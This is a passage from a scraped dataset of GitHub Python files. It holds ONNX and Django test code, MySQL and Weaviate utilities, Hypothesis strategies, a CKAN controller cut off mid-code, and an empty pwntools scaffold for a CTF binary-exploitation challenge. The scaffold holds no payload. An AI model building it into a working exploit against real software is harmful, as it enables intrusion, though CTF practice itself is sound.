helper.make_node(\"MatMul\", [\"input\", qkv_weight_initializer.name], [\"matmul1\"], name=\"matmul1\")\nadd1 = helper.make_node(\"Add\", [\"matmul1\", qkv_bias_initializer.name], [\"add1\"], name=\"add1\")\nsplit = helper.make_node(\n \"Split\",\n [\"add1\"],\n [\"mixed_query_layer\", \"mixed_key_layer\", \"mixed_value_layer\"],\n name=\"split\",\n axis=2,\n)\nreshape = helper.make_node(\n \"Reshape\",\n [\"mixed_query_layer\", shape_initializer.name],\n [\"reshape\"],\n name=\"reshape\",\n)\nreshape1 = helper.make_node(\n \"Reshape\",\n [\"mixed_key_layer\", shape_initializer1.name],\n [\"reshape1\"],\n name=\"reshape1\",\n)\nreshape2 = helper.make_node(\n \"Reshape\",\n [\"mixed_value_layer\", shape_initializer2.name],\n [\"reshape2\"],\n name=\"reshape2\",\n)\ntranspose = helper.make_node(\"Transpose\", [\"reshape\"], [\"transpose\"], name=\"transpose\", perm=[0, 2, 1, 3])\ntranspose1 = helper.make_node(\"Transpose\", [\"reshape1\"], [\"transpose1\"], name=\"transpose1\", perm=[0, 2, 3, 1])\ntranspose2 = helper.make_node(\"Transpose\", [\"reshape2\"], [\"transpose2\"], name=\"transpose2\", perm=[0, 2, 1, 3])\nmatmul2 = helper.make_node(\"MatMul\", [\"transpose\", \"transpose1\"], [\"matmul2\"], name=\"matmul2\")\n# Use the mask input for below 3 nodes. 
This is different from the original GPT-2 model, but it's OK for the sub-graph test.\ndiv = helper.make_node(\"Div\", [\"matmul2\", \"mask\"], [\"div\"], name=\"div\")\nmul = helper.make_node(\"Mul\", [\"div\", \"mask\"], [\"mul\"], name=\"mul\")\nsub = helper.make_node(\"Sub\", [\"mul\", \"mask\"], [\"sub\"], name=\"sub\")\nsoftmax = helper.make_node(\"Softmax\", [\"sub\"], [\"softmax\"], name=\"softmax\", axis=3)\ndropout1 = helper.make_node(\"Dropout\", [\"softmax\"], [\"dropout1\"], name=\"dropout1\")\nmatmul3 = helper.make_node(\"MatMul\", [\"dropout1\", \"transpose2\"], [\"matmul3\"], name=\"matmul3\")\ntranspose3 = helper.make_node(\"Transpose\", [\"matmul3\"], [\"transpose3\"], name=\"transpose3\", perm=[0, 2, 1, 3])\nreshape3 = helper.make_node(\"Reshape\", [\"transpose3\", shape_initializer3.name], [\"reshape3\"], name=\"reshape3\")\nmatmul4 = helper.make_node(\"MatMul\", [\"reshape3\", dense_weight_initializer.name], [\"matmul4\"], name=\"matmul4\")\nadd2 = helper.make_node(\"Add\", [\"matmul4\", dense_bias_initializer.name], [\"add2\"], name=\"add2\")\ndropout2 = helper.make_node(\"Dropout\", [\"add2\"], [\"dropout2\"], name=\"dropout2\")\n# Add dummy Identity so during inference dropout2 can be removed for testing.\nidentity = helper.make_node(\"Identity\", [\"dropout2\"], [\"output\"], name=\"identity\")\n\n# Create the graph (GraphProto)\ngraph_def = helper.make_graph(\n    [\n        matmul1,\n        add1,\n        split,\n        reshape,\n        reshape1,\n        reshape2,\n        transpose,\n        transpose1,\n        transpose2,\n        matmul2,\n        div,\n        mul,\n        sub,\n        softmax,\n        dropout1,\n        matmul3,\n        transpose3,\n        reshape3,\n        matmul4,\n        add2,\n        dropout2,\n        identity,\n    ],\n    \"self-attention-megatron-test-model\",\n    [X, X_mask],\n    [Y],\n    [\n        qkv_weight_initializer,\n        qkv_bias_initializer,\n        dense_weight_initializer,\n        dense_bias_initializer,\n        shape_initializer,\n        shape_initializer1,\n        shape_initializer2,\n        shape_initializer3,\n    ],\n)\n\nopsets = []\nonnxdomain = OperatorSetIdProto()\nonnxdomain.version = 12\nonnxdomain.domain = \"\" # The empty string (\"\") or absence of this field implies the operator set that is defined as part of the ONNX specification.\nopsets.append(onnxdomain)\n\nmsdomain = OperatorSetIdProto()\nmsdomain.version = 1\nmsdomain.domain = \"com.microsoft\"\n\nopsets.append(msdomain)\nkwargs = {}\nkwargs[\"opset_imports\"] = opsets\n\n# Create the model (ModelProto)\nmodel_def = helper.make_model(graph_def, producer_name=\"onnx-example\", **kwargs)\nonnx.save(model_def, \"self_attention_megatron_basic_test.onnx\")\n","repo_name":"microsoft/onnxruntime","sub_path":"onnxruntime/test/testdata/transform/model_parallel/self_attention_megatron_basic_test.py","file_name":"self_attention_megatron_basic_test.py","file_ext":"py","file_size_in_byte":6113,"program_lang":"python","lang":"en","doc_type":"code","stars":9700,"dataset":"github-code","pt":"18"}
+{"seq_id":"27875058188","text":"from sbyieldexception import SBYieldException\n\n\nclass DepositDateAfterLastYieldPaymentError(SBYieldException):\n\t\"\"\"\n\tException raised when the deposit CSV file contains a deposit whose date is after the\n\tlast yield payment date.\n\t\"\"\"\n\tdef __init__(self,\n\t\t\t\t depositCsvFilePathName,\n\t\t\t\t owner,\n\t\t\t\t depositDate,\n\t\t\t\t depositAmount,\n\t\t\t\t yieldPaymentDate):\n\t\terrorMsg = \"CSV file {} contains a deposit of {} for owner {} with a deposit \\\ndate of {} which is after the last payment date of {}\".format(depositCsvFilePathName,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t depositAmount,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 
owner,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t depositDate,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t yieldPaymentDate)\n\n\t\tsuper(DepositDateAfterLastYieldPaymentError, self).__init__(msg=errorMsg)\n","repo_name":"Archanciel/SByield","sub_path":"depositdateafterlastyieldpaymenterror.py","file_name":"depositdateafterlastyieldpaymenterror.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"42589315061","text":"import pandas as pd\nimport mysql.connector\nfrom mysql.connector import Error\nfrom mysql.connector import errorcode\nfrom Volumes import Volumes\nfrom Mysql_connect import Mysql_connect\n\n\nclass Dictionnaires (Volumes): \n\n    \n    id_dictionnaire=0\n    connect = Mysql_connect()\n    \n    def __init__(self,id_dictionnaire,id_volume=0,auteur=0):\n        super().__init__(id_volume,auteur)\n        \n\n    def getIdDictionnaire(self):\n        return self.id_dictionnaire\n    \n    def setIdDictionnaire (self, id_dictionnaire):\n        self.id_dictionnaire = id_dictionnaire\n    \n    \n    \n    def creer_dictionnaire(self,id_volume):\n        try :\n            \n            cnx = self.connect.connexion()\n            \n            if (cnx.is_connected()):\n                print('is connected')\n            \n            cursor = cnx.cursor()\n            \n            \n            requete = ('insert into dictionnaires (id_volume) values (%s);') \n            values = (id_volume,) # cursor.execute expects a parameter sequence, hence the one-element tuple\n            print(requete,values)\n            cursor.execute(requete,values) \n\n            \n            \n            cnx.commit()\n            cursor.close()\n            \n            \n            cnx.close()\n\n        except mysql.connector.Error as error:\n            print(\"Failed to insert record {}\".format(error))\n\n    \n    \n    # def modifier_dictionnaire(self,id_journaux,date_de_parution):\n    #     try :\n            \n    #         cnx = self.connect.connexion()\n            \n    #         if (cnx.is_connected()):\n    #             print('is connected')\n            \n    #         cursor = cnx.cursor()\n            \n            \n    #         requete = ('update journaux set date_de_parution = %s where id_journ = %s;') \n    #         values = (date_de_parution,id_journaux)\n    #         print(requete,values)\n    #         cursor.execute(requete,values) \n\n    #         cnx.commit()\n    #         cursor.close()\n            \n    #         cnx.close()\n\n    #     except mysql.connector.Error as error:\n    #         print(\"Failed to update record {}\".format(error))\n\n    # \n    \n    # def supprimer_journaux(self,id_journaux):\n    #     try :\n            \n    #         cnx = self.connect.connexion()\n            \n    #         if (cnx.is_connected()):\n    #             print('is connected')\n            \n    #         cursor = cnx.cursor()\n            \n            \n    #         requete = ('delete from journaux where id_journ = %s;') \n    #         values = (id_journaux)\n    #         print(requete,values)\n    #         cursor.execute(requete,values) \n\n    #         cnx.commit()\n    #         cursor.close()\n            \n    #         cnx.close()\n\n    #     except mysql.connector.Error as error:\n    #         print(\"Failed to delete record {}\".format(error))\n\n    # \n    \n    def liste_dictionnaires (self) :\n        \n        try :\n            \n            cnx = self.connect.connexion()\n            \n            if (cnx.is_connected()):\n                print('is connected')\n\n            cursor = cnx.cursor()\n\n            cursor.execute('select * from dictionnaires;')\n\n            \n            row = cursor.fetchall()\n            result = pd.DataFrame(row)\n\n            print(result)\n            \n            cursor.close() \n            cnx.close()\n            \n        except mysql.connector.Error as error:\n            print(\"Failed to select record {}\".format(error))\n\n    \n","repo_name":"Damosm/Bibliotheque","sub_path":"Dictionnaire.py","file_name":"Dictionnaire.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"22548788156","text":"import os.path\n\nimport mock\n\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.test import APITestCase\n\n\ndef authenticate(client, username=None, token=None):\n    if token is None:\n        token = 
Token.objects.get(user__username=username).key\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n\nclass APIv1Tests(APITestCase):\n fixtures = ['complete.json']\n\n\nclass APIv1RepositoryTests(APIv1Tests):\n list_url = '/api/v1/repositories/'\n\n def test_fetch_sources(self):\n # Use user brandon to make sure it works with users who are members\n # of multiple groups\n authenticate(self.client, 'brandon')\n response = self.client.get(self.list_url)\n\n for repo in response.data['results']:\n resp = self.client.get(repo['sources'])\n self.assertEquals(resp.status_code, 200)\n\n def test_fetch_external_dependencies(self):\n # Use brandon to make sure it works with users who are members\n # of multiple groups\n authenticate(self.client, 'brandon')\n response = self.client.get(self.list_url)\n\n for repo in response.data['results']:\n resp = self.client.get(repo['external_dependencies'])\n self.assertEquals(resp.status_code, 200)\n\n def test_create_repository_empty_fails_400(self):\n data = {}\n authenticate(self.client, 'eric')\n\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 400)\n self.assertEquals(response.data, {'name': ['This field is required.']})\n\n def test_create_repository_no_auth_fails_401(self):\n data = {}\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 401)\n\n def test_create_repository_incorrect_auth_fails_401(self):\n data = {}\n authenticate(self.client, token='invalidtoken')\n\n response = self.client.post(self.list_url, data, format='json')\n\n self.assertEquals(response.status_code, 401)\n\n def test_create_repository(self):\n data = {'name': 'testrepo'}\n authenticate(self.client, 'eric')\n\n response = self.client.post(self.list_url, data, format='json')\n\n self.assertEquals(response.status_code, 201)\n self.assertTrue(response.data['self'].startswith('http://testserver' + self.list_url), response.data['self'])\n expected_result = {'external_dependencies': response.data['self'] + 'external_dependencies/',\n 'name': 'testrepo',\n 'binary_source_list': 'deb http://127.0.0.1:8000/apt/eric/testrepo aasemble main',\n 'source_source_list': 'deb-src http://127.0.0.1:8000/apt/eric/testrepo aasemble main',\n 'self': response.data['self'],\n 'sources': response.data['self'] + 'sources/',\n 'user': 'eric',\n 'key_id': u''}\n\n self.assertEquals(response.data, expected_result)\n response = self.client.get(response.data['self'])\n self.assertEquals(response.data, expected_result)\n return response.data\n\n def test_create_duplicate_repository(self):\n data = {'name': 'testrepo'}\n authenticate(self.client, 'eric')\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 201)\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 409)\n\n def test_delete_repository(self):\n repo = self.test_create_repository()\n\n response = self.client.delete(repo['self'])\n\n self.assertEquals(response.status_code, 204)\n\n response = self.client.get(repo['self'])\n self.assertEquals(response.status_code, 404)\n\n def test_patch_repository(self):\n repo = self.test_create_repository()\n data = {'name': 'testrepo2'}\n\n response = self.client.patch(repo['self'], data, format='json')\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(response.data['self'], repo['self'], '\"self\" attribute changed')\n\n expected_result = {'external_dependencies': 
response.data['self'] + 'external_dependencies/',\n                           'name': 'testrepo2',\n                           'binary_source_list': 'deb http://127.0.0.1:8000/apt/eric/testrepo2 aasemble main',\n                           'source_source_list': 'deb-src http://127.0.0.1:8000/apt/eric/testrepo2 aasemble main',\n                           'self': response.data['self'],\n                           'sources': response.data['self'] + 'sources/',\n                           'user': 'eric',\n                           'key_id': u''}\n\n        self.assertEquals(response.data, expected_result)\n\n        response = self.client.get(response.data['self'])\n        self.assertEquals(response.data, expected_result, 'Changes were not persisted')\n\n    def test_patch_repository_read_only_field(self):\n        repo = self.test_create_repository()\n        data = {'user': 'testuser2'}\n\n        self.client.patch(repo['self'], data, format='json')\n\n    def test_delete_deleted_repository(self):\n        repo = self.test_create_repository()\n\n        response = self.client.delete(repo['self'])\n\n        self.assertEquals(response.status_code, 204)\n\n        response = self.client.delete(repo['self'])\n\n        self.assertEquals(response.status_code, 404)\n\n    def test_delete_repository_invalid_token(self):\n        repo = self.test_create_repository()\n        authenticate(self.client, token='invalidtoken')\n        response = self.client.delete(repo['self'])\n        self.assertEquals(response.status_code, 401)\n\n    def test_delete_repository_other_user(self):\n        repo = self.test_create_repository()\n        authenticate(self.client, 'aaron')\n        response = self.client.delete(repo['self'])\n        self.assertEquals(response.status_code, 404)\n\n    def test_delete_repository_super_user(self):\n        repo = self.test_create_repository()\n        authenticate(self.client, 'george')\n        response = self.client.delete(repo['self'])\n        self.assertEquals(response.status_code, 204)\n\n\nclass APIv2RepositoryTests(APIv1RepositoryTests):\n    list_url = '/api/v2/repositories/'\n\n\nclass APIv1BuildTests(APIv1Tests):\n    list_url = '/api/v1/builds/'\n\n    def test_fetch_builds(self):\n        # Use eric to make sure it works with users who are members\n        # of multiple groups\n        authenticate(self.client, 'eric')\n        response = self.client.get(self.list_url)\n        self.assertEquals(response.status_code, 200)\n\n\nclass APIv2BuildTests(APIv1BuildTests):\n    list_url = '/api/v2/builds/'\n\n\nclass APIv1SourceTests(APIv1Tests):\n    list_url = '/api/v1/sources/'\n\n    def test_create_source_empty_fails_400(self):\n        data = {}\n        authenticate(self.client, 'eric')\n\n        response = self.client.post(self.list_url, data, format='json')\n        self.assertEquals(response.status_code, 400)\n        self.assertEquals(response.data, {'git_repository': ['This field is required.'],\n                                          'git_branch': ['This field is required.'],\n                                          'repository': ['This field is required.']})\n\n    def test_create_invalid_url_fails_400(self):\n        data = {'git_repository': 'not a valid url'}\n        authenticate(self.client, 'eric')\n\n        response = self.client.post(self.list_url, data, format='json')\n        self.assertEquals(response.status_code, 400)\n        self.assertEquals(response.data, {'git_repository': ['Enter a valid URL.'],\n                                          'git_branch': ['This field is required.'],\n                                          'repository': ['This field is required.']})\n\n    def test_create_source_no_auth_fails_401(self):\n        data = {}\n        response = self.client.post(self.list_url, data, format='json')\n        self.assertEquals(response.status_code, 401)\n\n    def test_create_source_incorrect_auth_fails_401(self):\n        data = {}\n        authenticate(self.client, token='invalidtoken')\n\n        response = self.client.post(self.list_url, data, format='json')\n\n        self.assertEquals(response.status_code, 401)\n\n    def test_create_source(self):\n        authenticate(self.client, 'eric')\n\n        response = 
self.client.get(self.list_url.replace('sources', 'repositories'))\n\n data = {'git_repository': 'https://github.com/sorenh/buildsvctest',\n 'git_branch': 'master',\n 'repository': response.data['results'][0]['self']}\n\n response = self.client.post(self.list_url, data, format='json')\n\n self.assertEquals(response.status_code, 201)\n self.assertTrue(response.data['self'].startswith('http://testserver' + self.list_url), response.data['self'])\n data['self'] = response.data['self']\n data['builds'] = data['self'] + 'builds/'\n self.assertEquals(response.data, data)\n\n response = self.client.get(data['self'])\n self.assertEquals(response.data, data)\n return response.data\n\n def test_delete_source(self):\n source = self.test_create_source()\n\n response = self.client.delete(source['self'])\n\n self.assertEquals(response.status_code, 204)\n\n response = self.client.get(source['self'])\n self.assertEquals(response.status_code, 404)\n\n\nclass APIv2SourceTests(APIv1SourceTests):\n list_url = '/api/v2/sources/'\n\n\nclass APIv1AuthTests(APIv1Tests):\n self_url = '/api/v1/auth/user/'\n\n def test_get_user_details(self):\n authenticate(self.client, 'eric')\n\n response = self.client.get(self.self_url, format='json')\n self.assertEquals(response.status_code, 200)\n self.assertEquals(response.data,\n {'username': u'eric',\n 'company': u'No Company',\n 'email': u'eric@example.com',\n 'avatar': u'https://avatars.githubusercontent.com/u/1234565?v=3',\n 'real_name': u'Eric Ericson'})\n\n\nclass APIv2AuthTests(APIv1AuthTests):\n self_url = '/api/v2/auth/user/'\n\n\nclass APIv1MirrorTests(APIv1Tests):\n list_url = '/api/v1/mirrors/'\n\n def test_create_mirror_empty_fails_400(self):\n data = {}\n authenticate(self.client, 'eric')\n\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 400)\n self.assertEquals(response.data, {'url': ['This field is required.'],\n 'series': ['This field is required.'],\n 'components': ['This field is required.']})\n\n def test_create_mirror_invalid_url_fails(self):\n data = {'url': 'not-a-url',\n 'series': ['trusty'],\n 'components': ['main']}\n authenticate(self.client, 'eric')\n\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 400)\n self.assertEquals(response.data, {'url': ['Enter a valid URL.']})\n\n def test_create_mirror(self):\n data = {'url': 'http://example.com/',\n 'series': ['trusty'],\n 'components': ['main']}\n authenticate(self.client, 'eric')\n\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 201)\n self.assertTrue(response.data['self'].startswith('http://testserver' + self.list_url), response.data['self'])\n data['self'] = response.data['self']\n data['refresh_in_progress'] = False\n data['public'] = False\n self.assertEquals(data, response.data)\n return response.data\n\n @mock.patch('aasemble.django.apps.mirrorsvc.tasks.refresh_mirror')\n def test_refresh_mirror(self, refresh_mirror):\n mirror = self.test_create_mirror()\n self.client.post(mirror['self'] + 'refresh/')\n self.assertTrue(refresh_mirror.delay.call_args_list)\n\n\nclass APIv2MirrorTests(APIv1MirrorTests):\n list_url = '/api/v2/mirrors/'\n\n\nclass GithubHookViewTestCase(APIv1Tests):\n @mock.patch('aasemble.django.apps.api.tasks.github_push_event')\n def test_hook(self, github_push_event):\n with open(os.path.join(os.path.dirname(__file__), 'example-hook.json'), 'r') as fp:\n res = self.client.post('/api/events/github/',\n 
data=fp.read(),\n                                   content_type='application/json',\n                                   HTTP_X_GITHUB_EVENT='push')\n        self.assertEquals(res.data, {'ok': 'thanks'})\n        github_push_event.delay.assert_called_with(\"https://github.com/baxterthehacker/public-repo\")\n\n    @mock.patch('aasemble.django.apps.buildsvc.tasks.poll_one')\n    def test_github_push_event(self, poll_one):\n        from .tasks import github_push_event\n        github_push_event(\"https://github.com/eric/project0\")\n        poll_one.delay.assert_called_with(1)\n","repo_name":"anand0707/overcastCloudTests","sub_path":"aasemble/django/apps/api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":13136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"41774344509","text":"from pwn import *\ncontext(arch=\"amd64\",os=\"linux\",terminal=[\"tmux\",\"splitw\",\"-h\"],log_level=\"debug\")\nGDB = args[\"GDB\"]\np = process(\"./timu\",env={\"LD_PRELOAD\":\"./libc-2.23.so\"})\n\nif GDB==\"1\":\n    gdb.attach(p)\n\nprint(p.recv())\npause()\n","repo_name":"go1me/ctf","sub_path":"xctf/pwn/Noleak/noleak.py","file_name":"noleak.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"73842317799","text":"# -*- coding: utf-8 -*-\n'''df'''\nimport math\n\ndef featprob(bayes, feature, category):\n    '''df'''\n    if category not in bayes.class_count:\n        return -1e300\n    if (feature, category) not in bayes.feature_count:\n        wynik = (math.log(float(0.001)/float(bayes.class_count[category])))\n        return wynik\n    wynik = float(bayes.feature_count[(feature, category)])\n    wynik = math.log(wynik/float(bayes.class_count[category]))\n    return wynik\n","repo_name":"grzekru/hakaton2","sub_path":"classifier/Task902.py","file_name":"Task902.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"7818843122","text":"\"\"\"Hypothesis search strategies.\"\"\"\n\nfrom typing import Optional, TypeVar\n\nimport hypothesis.strategies as st\n\nT = TypeVar('T') # pylint: disable=invalid-name\n\n\ndef optionals(strategy: st.SearchStrategy[T]) -> st.SearchStrategy[Optional[T]]:\n    \"\"\"Generate an optional strategy.\"\"\"\n    return st.one_of(\n        st.none(), strategy\n    )\n\n\ndef int64s(\n    min_value: int = -(2 ** 63),\n    max_value: int = (2 ** 63) - 1\n) -> st.SearchStrategy[int]:\n    \"\"\"Generate an int64.\"\"\"\n    if min_value > max_value:\n        raise TypeError('min_value must be less than or equal to max_value.')\n    if min_value < -(2 ** 63):\n        raise TypeError(f'min_value must be greater than or equal to {-(2 ** 63)}.')\n    if min_value > (2 ** 63) - 1:\n        raise TypeError(f'min_value must be less than or equal to {(2 ** 63) - 1}.')\n    if max_value < -(2 ** 63):\n        raise TypeError(f'max_value must be greater than or equal to {-(2 ** 63)}.')\n    if max_value > (2 ** 63) - 1:\n        raise TypeError(f'max_value must be less than or equal to {(2 ** 63) - 1}.')\n    return st.integers(\n        min_value,\n        max_value\n    )\n\n\ndef uint64s(\n    min_value: int = 0,\n    max_value: int = (2 ** 64) - 1\n) -> st.SearchStrategy[int]:\n    \"\"\"Generate a uint64.\"\"\"\n    if min_value > max_value:\n        raise TypeError('min_value must be less than or equal to max_value.')\n    if min_value < 0:\n        raise TypeError('min_value must be greater than or equal to 0.')\n    if min_value > (2 ** 64) - 1:\n        raise TypeError(f'min_value must be less than or equal to {(2 ** 64) - 1}.')\n    if max_value < 0:\n        raise TypeError('max_value must be 
greater than or equal to 0.')\n    if max_value > (2 ** 64) - 1:\n        raise TypeError(f'max_value must be less than or equal to {(2 ** 64) - 1}.')\n    return st.integers(\n        min_value,\n        max_value\n    )\n","repo_name":"higherorderfunctor/snmp-stream","sub_path":"tests/strategies.py","file_name":"strategies.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"72670174440","text":"import json\n\nimport weaviate\nfrom dependency_injector.wiring import inject, Provide\n\nfrom ai_document_search_backend.container import Container\n\n\ndef get_batch_with_cursor(client, class_name, class_properties, batch_size, cursor=None):\n    query = (\n        client.query.get(class_name, class_properties)\n        .with_additional([\"id\"])\n        .with_limit(batch_size)\n    )\n\n    if cursor is not None:\n        return query.with_after(cursor).do()\n    else:\n        return query.do()\n\n\ndef get_number_of_objects(client: weaviate.Client, class_name: str) -> int:\n    \"\"\"\n    Source: https://weaviate.io/developers/weaviate/manage-data/read-all-objects\n    \"\"\"\n\n    cursor = None\n    aggregate_count = 0\n    while True:\n        results = get_batch_with_cursor(\n            client, class_name=class_name, class_properties=[], batch_size=100, cursor=cursor\n        )\n        # If empty, we're finished\n        if len(results[\"data\"][\"Get\"][class_name]) == 0:\n            break\n\n        objects_list = results[\"data\"][\"Get\"][class_name]\n        aggregate_count += len(objects_list)\n\n        # Update the cursor to the id of the last retrieved object\n        cursor = results[\"data\"][\"Get\"][class_name][-1][\"_additional\"][\"id\"]\n    return aggregate_count\n\n\ndef print_schema(client, class_name: str) -> None:\n    print(json.dumps(client.schema.get(class_name), indent=2))\n\n\n@inject\ndef main(\n    client: weaviate.Client = Provide[Container.weaviate_client],\n    class_name: str = Provide[Container.config.weaviate.class_name],\n) -> None:\n    number_of_objects = get_number_of_objects(client, class_name)\n    print(f\"Number of objects: {number_of_objects}\")\n\n    print_schema(client, class_name)\n\n\nif __name__ == \"__main__\":\n    container = Container()\n    container.init_resources()\n    container.wire(modules=[__name__])\n\n    main()\n","repo_name":"petr7555/ai-document-search-backend","sub_path":"ai_document_search_backend/scripts/observability.py","file_name":"observability.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"38861432455","text":"import mysql.connector\r\n\r\n# Connector to communicate with the MySQL database\r\ndb = mysql.connector.connect(\r\n    host=\"localhost\",\r\n    user=\"root\",\r\n    passwd=\"*********\",\r\n    database=\"contactBook\"\r\n)\r\n\r\ncursor = db.cursor()\r\n\r\n# Code to create the database initially\r\n# cursor.execute(\"CREATE DATABASE contactBook\")\r\n\r\n# Code to create the table initially\r\n# cursor.execute(\"CREATE TABLE Contacts (personID int PRIMARY KEY AUTO_INCREMENT, firstName VARCHAR(50), lastName VARCHAR(50), number VARCHAR(15), email VARCHAR(100))\")\r\n\r\n# A display menu to enable user to interact with the program\r\ndef displayMenu():\r\n    action = input('Contact Book\\nChoose one of the following actions to perform\\n1. Add a contact\\n2. View all Contacts\\n3. Search for a contact\\n4. Delete a contact\\n5. Edit a contact\\n6. 
Exit\\n\\nPlease enter the number associated with the actions: ')\r\n    print()\r\n    if action == '1':\r\n        addContact()\r\n    elif action == '2':\r\n        printAllContacts()\r\n    elif action == '3':\r\n        searchContact()\r\n    elif action == '4':\r\n        deleteContact()\r\n    elif action == '5':\r\n        editContact()\r\n    elif action == '6':\r\n        exit()\r\n\r\n# Function to add a contact to the contact book\r\ndef addContact():\r\n    print(\"Please provide the following details to add a contact.\")\r\n    firstName = input(\"First Name: \")\r\n    lastName = input(\"Last Name: \")\r\n    number = input(\"Phone Number: \")\r\n    email = input(\"Email: \")\r\n\r\n    cursor.execute(\"INSERT INTO Contacts (firstName, lastName, number, email) Values (%s, %s, %s, %s)\", (firstName, lastName, number, email))\r\n    db.commit()\r\n    print()\r\n    print(\"Contact added successfully.\")\r\n    print()\r\n\r\n# Function to view all contacts\r\ndef printAllContacts():\r\n    cursor.execute(\"SELECT * FROM Contacts\")\r\n    contacts = cursor.fetchall()\r\n    if len(contacts) == 0:\r\n        print(\"No contacts found.\")\r\n    else:\r\n        for contact in contacts:\r\n            print(contact)\r\n    print()\r\n\r\n# Function to search for a contact\r\ndef searchContact():\r\n    action = input('Search Using: \\n1. First Name\\n2. Last Name\\n3. Phone Number\\n4. Email\\nPlease enter the number associated with the actions: ')\r\n    print()\r\n    if action == '1':\r\n        searchTerm = input('Please enter the first name: ')\r\n        cursor.execute(\"Select * FROM Contacts WHERE firstName = %s\", (searchTerm, ))\r\n    elif action == '2':\r\n        searchTerm = input('Please enter the last name: ')\r\n        cursor.execute(\"Select * FROM Contacts WHERE lastName = %s\", (searchTerm, ))\r\n    elif action == '3':\r\n        searchTerm = input('Please enter the number: ')\r\n        cursor.execute(\"Select * FROM Contacts WHERE number = %s\", (searchTerm, ))\r\n    elif action == '4':\r\n        searchTerm = input('Please enter the email: ')\r\n        cursor.execute(\"Select * FROM Contacts WHERE email = %s\", (searchTerm, ))\r\n    # Reuse the rows returned by the search query instead of re-querying the whole table\r\n    contacts = cursor.fetchall()\r\n    if len(contacts) == 0:\r\n        print(\"No contacts found.\")\r\n    else:\r\n        for contact in contacts:\r\n            print(contact)\r\n    print()\r\n\r\n# Function to delete a contact\r\ndef deleteContact():\r\n    print(\"How would you like to search for the contact to delete?\")\r\n    searchContact()\r\n    searchTerm = int(input(\"Please input the number associated with the contact you wish to delete: \"))\r\n    cursor.execute(\"DELETE FROM Contacts WHERE personID = %s\", (searchTerm, ))\r\n    db.commit()\r\n    print(\"Contact deleted successfully.\")\r\n    print()\r\n\r\n# Function to edit a contact\r\ndef editContact():\r\n    print(\"How would you like to search for the contact to edit?\")\r\n    searchContact()\r\n    contactID = int(input(\"Please input the number associated with the contact you wish to edit: \"))\r\n    print()\r\n    detail = input('Select the contact detail you would like to update: \\n1. First Name\\n2. Last Name\\n3. Phone Number\\n4. 
Email\\nPlease enter the number associated with the detail: ')\r\n    value = input(\"Please enter the new value for the detail: \")\r\n\r\n    if detail == '1':\r\n        cursor.execute(\"UPDATE Contacts SET firstName = %s WHERE personID = %s\", (value, contactID))\r\n    elif detail == '2':\r\n        cursor.execute(\"UPDATE Contacts SET lastName = %s WHERE personID = %s\", (value, contactID))\r\n    elif detail == '3':\r\n        cursor.execute(\"UPDATE Contacts SET number = %s WHERE personID = %s\", (value, contactID))\r\n    elif detail == '4':\r\n        cursor.execute(\"UPDATE Contacts SET email = %s WHERE personID = %s\", (value, contactID))\r\n\r\n    db.commit() # persist the update; without this the edit is lost when the connection closes\r\n    print()\r\n    print(\"Contact updated successfully.\")\r\n    print()\r\n\r\n# Main function that continuously runs displayMenu() until the user decides to exit the program\r\ndef main():\r\n    while True:\r\n        displayMenu()\r\n    \r\nmain()","repo_name":"mukhisameer/ContactBook","sub_path":"contactbook.py","file_name":"contactbook.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"71211441640","text":"# encoding: utf-8\n\nimport re\n\nimport ckan.lib.helpers as h\nfrom ckan import model\nfrom ckan.common import g\nfrom ckan.plugins.toolkit import (\n    ValidationError,\n    ObjectNotFound,\n    get_action,\n    _,\n    request,\n    BaseController,\n    abort,\n    render,\n    redirect_to,\n    config,\n)\nfrom ckan.lib.mailer import MailerException\n\nfrom ckanext.subscribe import email_auth\nfrom ckanext.subscribe import model as subscribe_model\n\nlog = __import__('logging').getLogger(__name__)\n\n\nclass SubscribeController(BaseController):\n    def signup(self):\n        # validate inputs\n        email = request.POST.get('email')\n        if not email:\n            abort(400, _(u'No email address supplied'))\n        email = email.strip()\n        # pattern from https://html.spec.whatwg.org/#e-mail-state-(type=email)\n        email_re = r\"^[a-zA-Z0-9.!#$%&'*+\\/=?^_`{|}~-]+@[a-zA-Z0-9]\"\\\n                   r\"(?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\\.[a-zA-Z0-9]\"\\\n                   r\"(?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$\"\n        if not re.match(email_re, email):\n            abort(400, _(u'Email supplied is invalid'))\n\n        # create subscription\n        data_dict = {\n            'email': email,\n            